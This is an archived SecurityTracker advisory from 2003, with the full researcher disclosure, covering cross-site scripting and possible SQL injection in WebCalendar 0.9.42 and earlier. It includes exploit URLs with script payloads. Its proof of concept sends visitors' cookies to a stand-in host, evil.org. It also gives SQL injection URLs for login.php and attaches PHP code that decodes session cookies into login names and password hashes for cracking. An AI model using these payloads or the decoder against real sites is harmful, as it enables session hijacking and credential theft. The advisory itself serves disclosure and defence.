SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Calendar)  >   WebCalendar Vendors:   Knudsen, Craig
WebCalendar Input Validation Flaws in Multiple Variables Permit Cross-Site Scripting Attacks and Possibly SQL Injection Attacks
SecurityTracker Alert ID:  1007625
SecurityTracker URL:  http://securitytracker.com/id/1007625
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 4 2003
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 0.9.42 and prior versions
Description:   Several input validation vulnerabilities were reported in WebCalendar. A remote user can conduct cross-site scripting attacks against calendar users. A remote user may also be able to inject SQL commands to be executed by the underlying database.

It is reported that the following files do not filter HTML code from user-supplied input in certain variables:

colors.php, week.php, day.php, month.php, week_details.php, view_l.php, view_m.php, view_t.php, view_v.php, view_w.php, week_details.php, and possibly others.

A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the WebCalendar software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>

http://[target]/webcalendar/week.php?user="><script>alert(document.cookie)</script>

It is also reported that a remote user can (via the cross-site scripting attacks, or via other methods) extract the target user's hashed password from the session ID contained in one of the target user's cookies. Then, the remote user can attempt to crack the encrypted password. Information on extracting the hashed password from the session ID is available at:

http://nocon.darkflame.net/CSS/decode.txt

It is also reported that a remote user may be able to exploit the view_t.php, view_w.php, and view_v.php scripts to inject SQL commands by submitting the following type of URL:

http://[target]/webcalendar/view_m.php?id=additional sql command

According to the report, the 'login.php' script is also vulnerable if "magic quotes" is set to off in the PHP configuration file. Some demonstration exploit URLs are provided:

http://[target]/webcalendar/login.php?user='additional%20sqlcommand
http://[target]/webcalendar/login.php?password='additional%20sql%20command

The vendor has reportedly been notified.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the WebCalendar software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user may be able to inject SQL commands to be executed by the underlying database.

Solution:   No solution was available at the time of this entry.
Vendor URL:  webcalendar.sourceforge.net/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Webcalendar <= 0.9.42 Cross Site Scripting Attacks and Potential SQL Injection Attack


--AqsLC8rIMeq19msA
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline




--AqsLC8rIMeq19msA
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="Wecalendar.txt"

Webcalendar <= 0.9.42
http://webcalendar.sourceforge.net/

  WebCalendar is a PHP application used to maintain a calendar for one or more persons


Cross Site Scripting
========================================

Files (Mabe Others):
----------------------------
includes/js/colors.php

Code Sniplet:
[...]
   window.opener.document.prefform.<?php echo $color?>.value= color;
[...]


Exploit: 
---------------------------
http://www.host.name/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>


Files (Mabe Others):
-------------------------
week.php

Code sniplet:
[...]
  echo html_for_add_icon (  date ( "Ymd", $days[$d] ), $time_h, $time_m, $user );
[...]

Exploit:
--------------------
http://www.host.name/webcalendar/week.php?user="><script>alert(document.cookie)</script>


Files (Mabe Others): 
-------------------------
day.php month.php week_details.php view_l.php view_m.php view_t.php view_v.php 
view_w.php week_details.php 

Code Sniplet:
[...]
  echo $eventinfo;
[...]

Exploit:
----------------
http://www.host.name/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>


POC:
-----------------
http://www.host.name/webcalendar/week.php?eventinfo=<script src=http://www.evil.org/evilcode.js</script>

"evilcode.js"
<--------------->
window.open('http://www.evil.org/cgi-bin/logcookie.cgi?'+document.cookie);
<--------------->

  We can then use the code provided in the files includes/functions.php and includes/validate.php
to decode the "webcalendar_session" hash taken from the cookie. PHP source to
decode the hash should be attached. 

>From functions.php:
<----------------->
// Extract a user's name from a session id
// This is a lame attempt at security.  Otherwise, users would be
// able to edit their cookies.txt file and set the username in plain
// text.
<----------------->

Source: http://nocon.darkflame.net/CSS/decode.txt 
Demo:   http://nocon.darkflame.net/CSS/decode.php

   Example: 
       
     webcalendar_session=838ea889b26c9772819d709b826e7b8f926d;

     Hash: 838ea889b26c9772819d709b826e7b8f926d
     Decoded: 
        Login: demo
        Passw: Mn7ggQrGTEpi2 

  We can then run a standard unix password cracking program on "Mn7ggQrGTEpi2" 


Potential SQL Injection:
============================

  This seems to affect the view_t.php, view_w.php, view_v.php and maybee 
  others. 

http://www.host.name/webcalendar/view_m.php?id=additional sql command

   If "magic quotes" is set to off, then login.php is also vulnerable.

http://www.host.name/webcalendar/login.php?user='additional%20sqlcommand
http://www.host.name/webcalendar/login.php?password='additional%20sql%20command


----------------------------------------------------------------------------------------

Author Contacted on: Tue, 29 Jul 2003
Response: 

From: Craig Knudsen <cknudsen@cknudsen.com>
Subject: Re: Webcalendar Vulnerabilities

The source of most of these security issues is the use of global
variables, which seemed to be the way to back in PHP3.  I've tried to
maintain compatibility to PHP3, but I'm thinking it's not worth the
security risks at this point.  I will likely drop the use of global
variables in one of the next couple of releases.

In the mean time, I'll take a look at the issues you've listed here.  
 
Thanks.
Craig

Requested Update on: Tue, 2 Sep 2003
Response: NONE

----------------------------------------------------------------------------------------


Advisory: 
http://nocon.darkflame.net/CSS/Wecalendar.txt

Addtional Resources:

- WWW Security White Paper
  http://www.discover.co.uk/www-secuirity.html
        
- Perl: http://www.developer.com/lang/article.php/861781
- PHP:  http://www.phpadvisory.com/articles/view.phtml?ID=5
- SQL Injection:
  http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
        
- HTML Code Injection and Cross-site scripting
  http://www.technicalinfo.net/papers/CSS.html
           
- Google is your friend ;)
  http://www.google.com


- nocon
Date: Wed Sep 3 2003
http://nocon.darkflame.net/


--AqsLC8rIMeq19msA
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="webcaldecode.phps"

<head>
    <title> Webcalendar Cookie Decode </title>
</head>

<form method=post action="<? echo $PHP_SELF ?>">
<table width="200" border="0" cellspacing="1" cellpadding="0" bgcolor="#000000">
<tr><td>
   <table width="100%" border="0" cellspacing="2" cellpadding="2" bgcolor="#FFFFFF">
      <tr align="center">
        <td colspan="2">Webcalendar Cookie Decode <br> <a href=http://nocon.darkflame.net/>
        http://nocon.darkflame.net/</a> <br><br>
       </td>
      </tr>
     <tr>
    <td><strong>Hash</strong></td>  
    <td align="right"><input type="text" name="hash" size="60"></td>
   </tr>
<tr>
    <td>&nbsp;</td>
    <td align="center"> <input type="submit" value="Decode"></td>
</tr>
</table>
    </td>
</tr>
</table>
</form>

<?php

$encoded_login = $HTTP_POST_VARS['hash'];
$offsets = array ( 31, 41, 59, 26, 54 );

function hextoint ( $val ) {
  if ( empty ( $val ) )
    return 0;
  switch ( strtoupper ( $val ) ) {
    case "0": return 0;
    case "1": return 1;
    case "2": return 2;
    case "3": return 3;
    case "4": return 4;
    case "5": return 5;
    case "6": return 6;
    case "7": return 7;
    case "8": return 8;
    case "9": return 9;
    case "A": return 10;
    case "B": return 11;
    case "C": return 12;
    case "D": return 13;
    case "E": return 14;
    case "F": return 15;
  }
  return 0;
}

function decode_string ( $instr ) {
  global $offsets;
  $orig = "";
  for ( $i = 0; $i < strlen ( $instr ); $i += 2 ) {
    $ch1 = substr ( $instr, $i, 1 );
    $ch2 = substr ( $instr, $i + 1, 1 );
    $val = hextoint ( $ch1 ) * 16 + hextoint ( $ch2 );
    $j = ( $i / 2 ) % count ( $offsets );
    $newval = $val - $offsets[$j] + 256;
    $newval %= 256;
    $dec_ch = chr ( $newval );
    $orig .= $dec_ch;
  }
  return $orig;
}

$login_pw = split('\|', decode_string ($encoded_login));
$login = $login_pw[0];
$cryptpw = $login_pw[1];

echo "<b> Login:</b> $login <br>";
echo "<b> Passw:</b> $cryptpw <br>";

?>

--AqsLC8rIMeq19msA--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC